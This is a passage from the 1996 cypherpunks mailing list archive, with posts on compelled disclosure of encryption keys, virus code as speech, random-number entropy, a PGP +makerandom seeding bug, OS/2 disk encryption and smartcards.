>motion calling for measures to deal with the defendant's supposed 
>conduct in bad faith in answering the discovery requests presented by the 
>plaintiff."  Somehow, however, I doubt it.

Much better!  

>> BTW, you seem to have forgotten that this would be an excellent way to deter 
>> the kind of "knock and smash" warrant service common amongst government 
>> thugs.  Any argument by the cops that "we must break down the door or else 
>> they'll erase the data!" is rendered obviously silly if the data is ALREADY 
>> encrypted and inaccessible.
>
>This requires the assumption that all the data is already encrypted, not 
>an assumption a prosecutor or private litigant is about to make.

They might not make such an "assumption," however it's an issue that must be 
addressed.  I think that search done by COS lawyers last year (can't recall 
the target; I'm sure somebody recalls it) in which they not only copied data 
but also erased it from the hard disk...including other material not 
relevant to the case... is instructive.  At least in hindsight, this was an 
improper search using improper techniques, which improperly allowed the 
defendant to damage the property searched.  Surely you agree that was in 
error, whether or not you agree that the whole search was wrong, per se.  

There is certainly a good justification to make it as difficult as possible 
for those wanting to serve a search warrant in an _abusive_ fashion.  
Pre-encrypting the data would have ensured that the COS had access to none 
of the data while appeals occurred, and would have required that they 
continue to justify the search SUBSEQUENT TO its completion in order to have 
the judge compel some sort of key.  If, arguably, the behavior at the search 
was wrong, that fact would have been citable as evidence of the abusive 
nature of their original  request.  As it is, COS was allowed to run 
roughshod over Constitutional rights, they abused a court, etc. Moreover, 
none of this was reversible, in REALITY.  You can't turn back the clock and 
undo the search or the erasure of data, etc.  

And I think my original conclusion was correct:  While most people don't 
encrypt most data NOW, in a few years just about everybody who has 
"sensitive" data will be using some sort of system to do this.  At that 
point, the reality will be that search warrants will be issued _without_  
any presumption that the evidence in any computer in the place will be 
identifiable, and thus the argument "we've gotta go in or the evidence will 
disappear!" will be obviously wrong.  

Jim Bell

jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Apr 1996 15:24:31 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
Message-ID: <ad9efef905021004de07@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM 4/20/96, Computer Virus Help Desk wrote:
>At 09:08 PM 4/19/96 -0700, Tim May wrote:
>>
>>It should be interesting to see what happens when the Bernstein ruling
>>(assuming it is further upheld as the court case and appeals proceed) meets
>>the proposed law making the writing of virus code a crime.
>>
>>If crypto  software is essentially speech, albeit in a non-traditional
>>human language, then virus software is no different.

My point. (Also a point made by Mark Neely, I just noticed, when he wrote a
couple of days ago: "Well, that puts legislation making virus authoring a
crime
into a new (and difficult) position.")

>To the best of our knowledge simply writing Virus Code including it's
>"distribution" is not a crime in the United States.  However, the
>deliberate, malicious upload or infection of another's computer or system is
>a crime in many states.

Again, my point. I was not saying such virus writing is currently against
U.S. laws, at least not at the national level (the fifty states and various
other local governments have their own laws, as the Georgia example about
remailers is only the latest example of).


>We don't see the "Bernstein" ruling as having an effect in the U.S. one way
>or the other.  Virus Code seems to be treated just like "speech" right now.
>Use "it" to yell "fire" in a crowded theater and see what happens.
>Deliberately and maliciously infect another's computer or system with a
>computer virus and see what happens.
>
>What proposed law making writing virus code a crime were you referring to ?

I was referring to the general discussion reported here and in places like
"Risks" about illegalizing the generation of virus software. (A search of
the archives, when they come back up, will reveal debates here on this.)

(And I dimly recall at least one state legislature passing a law making
"virus software" ipso facto illegal, regardless of being used in a trespass
situation. The archives may produce more on this.)

I don't think such a law is Constitutional, which is my point. Judge Patel
seems to recognize this, as it relates to the Bernstein case.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 21 Apr 1996 12:27:14 +0800
To: cypherpunks@toad.com
Subject: Congress puts bomb-making material on internet
Message-ID: <ad9f0aaa0202100488be@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 PM 04/19/96, Rich Graves wrote:
>Oh yeah, and Biden read the full text of the "Attention All Unabomber
>Wannabes" and "Babyfood Bombs" documents into the Congressional Record,
>supposedly to underscore the point that those nasty Republicans are
>endorsing such nasty nasty stuff. Sort of like Exon's little blue book.
>
>So if you want to know how to build a baby-food bomb, simply write your
>congresscritter.

Or access the congressional record on thomas, as Rich gives earlier gives
us a URL to.  Go to http://thomas.loc.gov/r104/r104s17ap6.html, choose the
second TERRORISM PREVENTION ACT--CONFERENCE REPORT link, choose the first
BIDEN link.

Congress is putting information on how to build babyfood bombs on the
internet!   Clearly, the first thing the FBI would do under the law Biden
wants is wiretap congress to see who is accessing the congressional record.
Wonder what the congressional librarians who run thomas think of that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Apr 1996 18:05:03 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Smartcards are coming to the US
Message-ID: <v02120d0dad9f5dfbbe2f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:33 4/20/96, Black Unicorn wrote:
>On Sat, 20 Apr 1996, Lucky Green wrote:
>
>> Years after smartcards have become ubiquitous in such countries as Pakistan
>> and Nepal, not to mention Europe, I just saw my first smartcard commercial
>> ever on US television.
>>
>> Way to go :-)
>
>Have you seen the Visa (mastercard) commercial that shows the finger
>print reader and spouts off "Single digit PINs"  (Digit, get it?)

No, I saw the MC commercial with the Australian pilot. Are you serious?

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sun, 21 Apr 1996 12:25:32 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: spinner entropy
In-Reply-To: <Pine.SUN.3.93.960420170547.26203A-100000@eskimo.com>
Message-ID: <3179954A.176A@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


> I believe this whole thread about randomness and entropy started with the
> search for a portable software RNG and the discussion of how to estimate
> the entropy of spinners.  If we accept the above paragraph, then we have
> to reject spinners as a candidate for such a RNG, for two reasons.  First,
> we have no model of how spinners generate randomness, so we can't estimate
> their entropy.  Second, even if we developed such a model for a particular
> spinner on a particular OS, the model itself would not be portable because
> it would likely rely on nonportable assumptions about the OS.
> 
> Do we have other candidates for portable software RNGs?
> 
> Wei Dai

I think it is best to have a black box that can not be modeled personally. 
Anyway I am in the middle of putting together a portable RNG that will should 
consist of nothing more than a photoelectric tube, 9volt battery, and a bit of 
wiring. It will connect through the serial port. Just put your favorite 
radioactive substance near it and your set. before people freak out, there are 
many substances that will produce enough beta particles without killing 
anyone. In fact you could just use background radiation, but it would take 
longer. Anyway I'll let you all know how it turns out.

-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 21 Apr 1996 16:00:57 +0800
To: cypherpunks@toad.com
Subject: Re: Add-in encryption module to Netscape
Message-ID: <199604210453.VAA01630@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:42 PM 4/20/96 -0500, Alex Strasheim wrote:
>The best answer for these sorts of problems (at least for those of you not
>constrained by ITAR) might be java form processing applets that use their
>own crypto routines to submit the data.

I have thought about the sources of entropy available to a Java applet, and
there aren't many.  You should design your protocol so entropy is not
needed on the applet side.  Entropy is normally used to pick symmetric
encryption keys, and Initialization vectors


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 21 Apr 1996 16:00:30 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: 5th protect password?
In-Reply-To: <m0uAiWV-00091CC@pacifier.com>
Message-ID: <Pine.BSF.3.91.960420214313.7498B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >   A defendant can be compelled to produce material evidence that
> >   is incriminating.  Fingerprints, blood samples, voice
> >   exemplars, handwriting specimens, or other items of physical
> >   evidence may be extracted from a defendant against his will.

> As you might expect, I see a problem (and a pattern!) with even these 
> examples.  Notice that with the possible exception of "handwriting 
> specimens", the examples above all represent pieces of evidence whose 
> utility was only made technologically possible by developments done more 
> than a century after the writing of the Constitution.  Fingerprints have 

I think you missed the main pattern... When a suspect is required to
provide fingerprints, voice, blood and/or handwriting samples, those
things are used exclusively for _identification_.

The only exceptions I can think of are when blood, breath and urine
samples are taken from a suspect to detect certain chemicials in the body. 
But, AFAIK, those exceptions are entirely the product of the recent war on
drugs. 

Just my two bits. IANAL.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 12:51:55 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Yadda Yadda Yadda] Re: OS/2 encryption utilities
In-Reply-To: <m0uAnQG-0008yqC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960420215800.13247A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996, jim bell wrote:

> At 06:08 PM 4/20/96 -0400, Black Unicorn wrote:

> >Were I a Co$ attorney, I would use this to bring discovery violations 
> >if I took you to court.
> 
> You know, I've always thought it odd how some people misuse the English 
> language when they speak in their chosen shorthand.  "bring discovery 
> violations"?  How, exactly, does one _BRING_ a "discovery violation"?   
> Like, maybe, bring it in a whellbarrow?!?   Is "bring" a proper word in this 
> context?  Why not stop using that silly shorthand.

Perhaps Mr. Bell would have been happier if I had said "bring forth a 
motion calling for measures to deal with the defendant's supposed 
conduct in bad faith in answering the discovery requests presented by the 
plaintiff."  Somehow, however, I doubt it.

Like I told Mr. Bell before, when he starts paying my hourly rate, I will 
copyedit all my posts.

> BTW, you seem to have forgotten that this would be an excellent way to deter 
> the kind of "knock and smash" warrant service common amongst government 
> thugs.  Any argument by the cops that "we must break down the door or else 
> they'll erase the data!" is rendered obviously silly if the data is ALREADY 
> encrypted and inaccessible.

This requires the assumption that all the data is already encrypted, not 
an assumption a prosecutor or private litigant is about to make.  The 
case will then become one of a defendant with a reputation for concealing 
or otherwise destroying evidence, and a private litigant would be quite 
justified in calling for measures to preserve what evidence might have 
thusfar survived encryption.

 If anything, it would make the data permanently 
> inaccessible since it would make (arguably) the release of a decrypt key 
> "incriminating" if it were a criminal case. 

Well then, next time I am involved in a civil or criminal case I will just 
suggest that the defendant simply encrypt all his documents, burn the paper 
and then turn over the cyphertext to the plaintiff to comply with 
discovery.  Now the plaintiff will be powerless to touch us.  In a 
criminal case, the defendant will be protected completely from 
prosecution by the Fifth Amendment.  I will win _every case_, I will be 
famous!  They will call for me all over the world.  I will then use my 
profits to buy a massive ice maker, and freeze the planet's water 
supply.  Those humans will have to come to me for their precious 
commodity.  We can make billions on the sale of ice melters, and the 
franchise rights to our chain of fast water stores will be 
priceless!  We will _take over the world_.

Muwahahaha.

Pinky:  "But Brain, why don't we just buy a pack of cards?  I like cards."

(What color is the sky in your world Mr. Bell?)

> Yet another excellent reason to encrypt the data is that it deters 
> burglaries, where the purpose of the burglary is to get this data illegally. 
>  Given the COS's history, that is a reasonable fear.
> 
> Jim Bell
> 
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 13:27:26 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <v02120d05ad9f2fef5d94@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960420223254.13247C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996, Lucky Green wrote:

> Years after smartcards have become ubiquitous in such countries as Pakistan
> and Nepal, not to mention Europe, I just saw my first smartcard commercial
> ever on US television.
> 
> Way to go :-)

Have you seen the Visa (mastercard) commercial that shows the finger 
print reader and spouts off "Single digit PINs"  (Digit, get it?)

> Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeffrey I. Schiller" <jis@MIT.EDU>
Date: Sun, 21 Apr 1996 13:44:32 +0800
To: cypherpunks@toad.com
Subject: PGP's +makerandom is broken (was: Re: Article on PGP flaws)
Message-ID: <3179A2EB.646D@mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On April 16, 1996 jf_avon@citenet.net said:
> I fed the result of 
> pgp +makerandom=2000 rnd.pgp 
> into noisesphere.exe 
>
> Every times, it gives a distribution that looks like a zebra from the 
> top view.  Any comments?

This is a bug in PGP. +makerandom doesn't work properly. I discovered
this a few week ago myself when I needed some random numbers for
another project. Due to a programming bug, the idea based random number
generator doesn't get initialized (read: doesn't get seeded at all)
when +makerandom is used. Note: +makerandom is an undocumented feature.

IMPORTANT: Only +makerandom is effected. In normal use PGP properly
generates random session keys as well as RSA public key pairs.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXmiyMUtR20Nv5BtAQHiYwP/dEAf5w0KstdALRabGYeUOlhEEN+fvVJH
+TE215jh91EvPP2h9XqnOS5tWKiHpAjoRng5yUF6vyfD9rsHTS9EkCPC+yrlAkPb
E5XrnAsOx3W1EkkT2kA15RDePt8lOpXetltNVBsGqBMEupCFExYldz7h6o9g9DQj
e+NSMQZzIB8=
=m21a
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 21 Apr 1996 17:48:10 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Hardware RNG (was Re: spinner entropy)
In-Reply-To: <3179954A.176A@iconn.net>
Message-ID: <Pine.BSF.3.91.960420223831.7579C-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Anyway I am in the middle of putting together a portable RNG that will should 
> consist of nothing more than a photoelectric tube, 9volt battery, and a bit of 
> wiring. It will connect through the serial port. Just put your favorite 
> radioactive substance near it and your set. before people freak out, there are 

Why not just use a sound sample? "Please blow into the microphone"...
You've got the randomness of the sound itself, along with the minute
errors produced by the analog/digital converter. Should be able to get
plenty of entropy. Maybe even just use background noise.

Even if you don't have a sound card, you could probably fix something up 
that plugs into a port.

Seems like a good idea, but I'm no expert on entropy.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 21 Apr 1996 13:58:12 +0800
To: cypherpunks@toad.com
Subject: Re: OS/2 encryption utilities
In-Reply-To: <199604202027.OAA28387@xmission.xmission.com>
Message-ID: <9604210303.AA1314@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Deana" == mirele  <mirele@xmission.com> writes:

  > ...I am in search of OS/2 disk encryption programs...

However, for those of you who can wait...

  > From: pb@netcom.com
  > Organization: Quantum Corp. Milpitas CA USA
  > Newsgroups: comp.os.os2.utilities

  > I am beta testing an ifs that does DES and DES3 on a network-like
  > drive letter.  Example -- x: may be assigned to d:\unknown.
  > Then whenever you write to x: the file becomes encrypted.

  > But it aint your ideal freeware does everything product.

  > It is not my product.  My guess is that it will cost US$150 and should
  > hit selected mail order houses in shrink wrap in June or July.

  > Drag and drop of selected files or entire subdirectories into encrypted
  > form is also supported.  (Files often become smaller because compression
  > is used.)

  > Expect announce here with URL for more info when product is ready.

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mirele@xmission.com
Date: Sun, 21 Apr 1996 16:26:56 +0800
To: cypherpunks@toad.com
Subject: OS/2 encryption
Message-ID: <199604210544.XAA09283@xmission.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


I have received a lot of comment about my request for OS/2
encryption...perhaps I didn't make myself clear.

I have already taken precautions (have been, for over a year) to protect
my private documents and email via use of PGP.  I simply wanted to improve
the security of my home system overall.  I have been alarmed to see how,
in the Wollersheim and Penney court cases, the Church of Scientology was
able to sue people, take custody of their computers, and basically trash
their hard drives.  Frankly, I've worked too damned hard on getting my
system just right to have some bozo blunder in and erase things, either
through stupidity, cupidity, or maliciousness.

*That's* why I inquired about disk security.  Not because I'm trying to
hide something from Scientology...but because I don't appreciate people
messing around with something that I've worked very hard on.

Deana M. Holmes
mirele@xmission.com
-----BEGIN GEEK CODE BLOCK-----
Version:  3.1
GAT d- s++ a C++ U P L E- W++ N++ o-- K++ w--- O++ PS++ PE-- Y+ PGP+ t 5
X-- R- tv-- b++ DI++ D++ G e++++ h+ r* x++
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sun, 21 Apr 1996 15:33:07 +0800
To: Jeremey Barrett <jeremey@forequest.com>
Subject: Re: spinner entropy
In-Reply-To: <Pine.BSI.3.91.960420193617.11348A-100000@newton.forequest.com>
Message-ID: <3179BFF2.157A@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeremey Barrett wrote:
> 
>  Wei Dai writes:
> > Do we have other candidates for portable software RNGs?
> >
> >
> 
> What is more important, good portable software RNGs or good portable
> seeding mechanisms?  Seems to me there are good RNGs out there, but
> there is virtually no way to portably guarantee a good seed.
> 
> Netscape's RNG was probably good as any, but their seed sucked, so they
> got cracked.

Take an RC4 state box.  grab 30 or so random seeds from a hardware device, use them 
to mix the state box, and use the rest of RC4 to grab random values. Just an idea, 
very fast at least.
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: timd@consensus.com (Tim Dierks)
Date: Sun, 21 Apr 1996 19:57:36 +0800
To: jf_avon@citenet.net
Subject: Re: PGP's +makerandom is broken (was: Re: Article on PGP flaws)
Message-ID: <v02140b02ad9f9d2812ba@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 PM 4/20/96, Jeffrey I. Schiller wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On April 16, 1996 jf_avon@citenet.net said:
>> I fed the result of
>> pgp +makerandom=2000 rnd.pgp
>> into noisesphere.exe
>>
>> Every times, it gives a distribution that looks like a zebra from the
>> top view.  Any comments?
>
>This is a bug in PGP. +makerandom doesn't work properly. I discovered
>this a few week ago myself when I needed some random numbers for
>another project. Due to a programming bug, the idea based random number
>generator doesn't get initialized (read: doesn't get seeded at all)
>when +makerandom is used. Note: +makerandom is an undocumented feature.
>
>IMPORTANT: Only +makerandom is effected. In normal use PGP properly
>generates random session keys as well as RSA public key pairs.
>
>                                -Jeff

As true as this may be, it doesn't explain the original posters problem;
unseeded IDEA should generate data that looks every bit as random as data
which was fully seeded (otherwise IDEA leaks information). This should
raise a question regarding the utility of any post-facto measurement of
entropy; the stream of bits generate by IDEA encrypting zero values in CBC
mode with a key of zero clearly has little, if any, entropy, but the data
generated should be indistinguishable from true random data by all
statistical and pattern-recognition tests. See the discussion on
coderpunks.

Basically, to get crypto-quality random numbers:
 1) Use a secure generator; any secure block cipher or hash function will do.
 2) Seed it well. This is entirely specific to your situation & platform,
and is unmeasurable for practical purposes.

 - Tim

Tim Dierks                                              timd@consensus.com
Consensus Development                             http://www.consensus.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sun, 21 Apr 1996 13:51:24 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: 5th protect password?
In-Reply-To: <m0uAiWV-00091CC@pacifier.com>
Message-ID: <Pine.3.89.9604210212.A12876-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Sat, 20 Apr 1996, jim bell wrote:

> >   DOE v. United States, 487 U.S. 201; 108 S. Ct. 2341 (1988)

> >   A defendant can be compelled to produce material evidence that
> >   is incriminating.  Fingerprints, blood samples, voice
> >   exemplars, handwriting specimens, or other items of physical
> >   evidence may be extracted from a defendant against his will.
> 
> As you might expect, I see a problem (and a pattern!) with even these 
	
	The pattern is that you are again ignoring legal realities.
	<< Which is a thing to be expected.  >> 

> examples.  Notice that with the possible exception of "handwriting 
> specimens", the examples above all represent pieces of evidence whose 

	Handwriting as a tool used by most people, dates back to
	Eighteenth Century.  Before that, it was a trade practiced
	by scribes, and priests. In Europe, outside of the Clergy,
	illiteracy was the standard, till the begining of the Industrial
	Revolution.   <<   Remember that John Dee had an incredibly large
	library of 200 volumes.  >> 

> or so, etc.  I think even graphology (handwriting analysis) for legal 
> purposes is likewise comparatively recent, although there is no obvious 
> technological reason which this should have been so.  The last category, 

	Courts have yet to rule that an individual can be forced
	to provide a sample of their handwriting, if the purpose
	of obtaining such a script is for a graphological profile.
	More to the point, courts -- or at least US Courts -- don't
	accept graphological profiles, as proof of anything.  

	I suspect you confusing graphology with questioned document
	examination. Courts have ruled that a person may be forced
	to provide a sample of writing, for use in questioned document
	examination, without violating the fifth amendment.  << You ought
	to read the case law, to see why providing such a sample is
	not a fifth amendment violation ---- it might help you be a 
	better armchair lawyer, who spends to much time watching
	Perry Mason reruns.  >> 

> Anyone who denies this should be required to make a list of the kinds of 

	Questined Document Examination, which you alluded to, was
	first accepted by courts in the United States, at the turn 
	of the century.  And it was only after World War One, that 
	it was accepted in all courts in the US.  

        xan

        jonathon
        grafolog@netcom.com

        Owner:     Graphology-L@Bolis-com 
	

**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jed Liu <ljt@fs3.ucc.on.ca>
Date: Sun, 21 Apr 1996 17:50:25 +0800
To: Jonathan Litt <geeman@best.com
Subject: RE: On computer face recognition
In-Reply-To: <199604120630.XAA14255@dns1.noc.best.net>
Message-ID: <3179D617.16CA@fs3.ucc.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Litt wrote:
> 
>   geeman@best.com writes:
>    > Subject: Re: On computer face recognition:
>    > Date: Thu, 11 Apr 1996 23:30:49 -0700
>    >
>    > There was a piece, I _think_ in Scientific American, tho it might
>    > have been an AI journal, on face recognition by use of neural
>    > nets together with what were called "eigenface" images [...]
> 
> You are thinking of the article in Scientific American about the
> Vision and Modeling group at the MIT Media Lab. [...]

Actually, I read about it a while ago in "Discover Magazine".  (It could 
very well be that it was published in Sci. American also.....)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chevelle <love5683@voicenet.com>
Date: Sun, 21 Apr 1996 19:06:29 +0800
To: cypherpunks@toad.com
Subject: Re: HANDS UP!
Message-ID: <199604210734.DAA19234@mail.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys if there's anything I can do to help Kevin out anything at all
please let me know!

                                                        chevelle out....
07:14 AM 4/5/96 +0200, THE HIJACK-CREW wrote:
>HI THERE!    THIS IS etoy! 
>
>"the digital hijack" is NOW running !
>
>the internet-underground has decided: it is definitely time to blast SOUND
>and ACTION into the net !!! 
>
>our software-agents have invaded the main searchservers...
>
>++++for more information check out : http://www.hijack.org/++++++++++
>
>or get kidnapped live --> go to infoseek (netsearch-button on your browser)
>and search for:
>
>UNDERGROUND - CENSORSHIP - DISCO - XTC - CLINTON - PORSCHE -  CRACK -
>KRAFTWERK - ELVIS - TERROR - PENTHOUSE - SEGA - MONDRIAN - SEXPISTOLS -
>FIREARMS -  TARANTINO  - DJ - STONES - NETWORKS - BASE - CRIME - WAR -
>BUSINESS - WOMEN - NET - SOCIETY - ART - CASTRO - PARADISE - ATHLETICS -
>PULP - CYBER - YELLO - PETSHOPBOYS - REM - HUSTLER - BITCH - GUEVARA -
>SEVESO - MELODYMAKER - PORNO - GABBER - ROLLERBLADES - REBEL - OASIS -
>COMMUNICATIONS - PLAYBOY - BELGIUM - ORB - AND MANY MORE...
>
>these keywords will all appear on the TOP 10 - LIST. take the link to
>hijack.org to get the hijack-experience like millions of bored
>internet-users...
>
>download the hijackers-sound, get the best pictures and help us free our
>friend KEVIN D. MITNICK, THE SUPERHACKER (charged for electronic-terrorism,
>maximum sentence: 460 years prison) !
>
>we would be very happy to welcome you on our site. spread this new
>internet-lifestyle to your friends and to internet-freaks + surfers !
>
>this is a underground art-project not a bastard-business mail. our grab
>robot "etoy.IVANA" got your email-address by cruising the net.
>
>for the hijack-crew etoy
>MARTIN KUBLI
>
>email  mailme@etoy.com
>fax ++41 1 363 35 57
>_______________________________________________________________________
>http://www.hijack.org/
>for highres-pictures: ftp.etoy.com   /press
>
>
>etoy: 
>leaving reality behind...abusing technology...flashing the net
>
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 19:06:40 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: [Noise?] Re: Smartcards are coming to the US
In-Reply-To: <v02120d0dad9f5dfbbe2f@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960421034634.21453B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996, Lucky Green wrote:

> At 22:33 4/20/96, Black Unicorn wrote:

> >Have you seen the Visa (mastercard) commercial that shows the finger
> >print reader and spouts off "Single digit PINs"  (Digit, get it?)
> 
> No, I saw the MC commercial with the Australian pilot. Are you serious?

That's one of the series.

> Disclaimer: My opinions are my own, not those of my employer.
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 19:06:36 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Yadda Yadda Yadda] Re: 5th protect password?
In-Reply-To: <m0uAq1k-00091WC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960421034850.21453C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



[Obnoxiously long cc: list trimmed.]

On Sat, 20 Apr 1996, jim bell wrote:

